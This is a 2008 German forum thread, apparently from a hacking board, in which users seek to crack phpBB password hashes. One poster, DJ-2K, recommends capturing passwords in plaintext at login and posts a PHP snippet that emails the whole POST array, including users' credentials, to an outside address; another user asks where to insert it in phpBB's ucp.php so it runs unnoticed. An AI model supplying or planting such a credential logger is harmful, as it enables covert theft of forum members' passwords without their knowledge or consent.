pls cracken (kein md5)

**Buckethead** · 17.09.2008, 12:39

www.phpBBhacks.com

schaut mal hier nach, glaub aber nich das da was wirklich hilfreiches kommt...

//edit: hier gibts leider nur sachen für phpBB2

**manzle** · 17.09.2008, 12:43

phpbbhacks hat leider überhaupt nix mit wirklichem pw hacks zu tun...da gibts nur templates usw.

**zig81** · 17.09.2008, 14:11

http://www.free-hack.com/viewtopic.p...719&highlight=
http://www.free-hack.com/viewtopic.p...387&highlight=

**DJ-2K** · 17.09.2008, 16:50

Code:

$passwort = crypt(md5($passwort), $salt);

Hinweis: Es existiert keine decrypt Funktion, da crypt() eine Einweg-Verschlüsselung ist. Ich schätze mal, dass PHPBB je nach Länge des Passworts salted. Mir ist noch kein großer Unterschied aufgefallen zwischen Usern die gesaltete Hashs haben und denen die normale MD5s haben...

Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.

**manzle** · 17.09.2008, 22:20

Zitat von DJ-2K

Und wenn ihr die Passwörter aus euren eigenen Foren haben wollt, dann geht das bei Gottes Willen auch einfacher... Indem ihr die PWs sofort im Klartext bei jedem Login in eine Datei schreibt.

wie kann ich das abändern, dass es auch in ne datei geschrieben wird?

**DJ-2K** · 18.09.2008, 13:12

Indem du in etwa sowas in die Login-Seite einbaust:

Code:

<?

//Checken ob Post Daten enthällt
if(!empty($_POST))
//Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));

?>

Statt Mail lassen sich natürlich auch Text-DBs oder normale DBs verwenden um Daten zu speichern...

**H4x0r007** · 18.09.2008, 13:38

Zur Info: Der crypt() Befehl ist ein DES-Fingerprint

**manzle** · 18.09.2008, 20:11

Code:

<?

//Checken ob Post Daten enthällt
if(!empty($_POST))
//Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));

?>

kennt sich jemand mit phpbb aus um mir sagen zu können wo dieser code rein muss?

kann es sein dass es die "ucp.php" ist?? die wird nämlich aufgerufen, wenn man auf anmelden klickt.

und and welche stelle in der datei kommt der code hin. wenn ich ihn einfach nur ans ende hänge kann man sich nicht mehr einloggen!!!

Added after 116 hours:

kann mir jemand helfen...finds einfach nicht raus

Thema: pls cracken (kein md5)

Themen-Optionen

Anzeige

Stichworte

Berechtigungen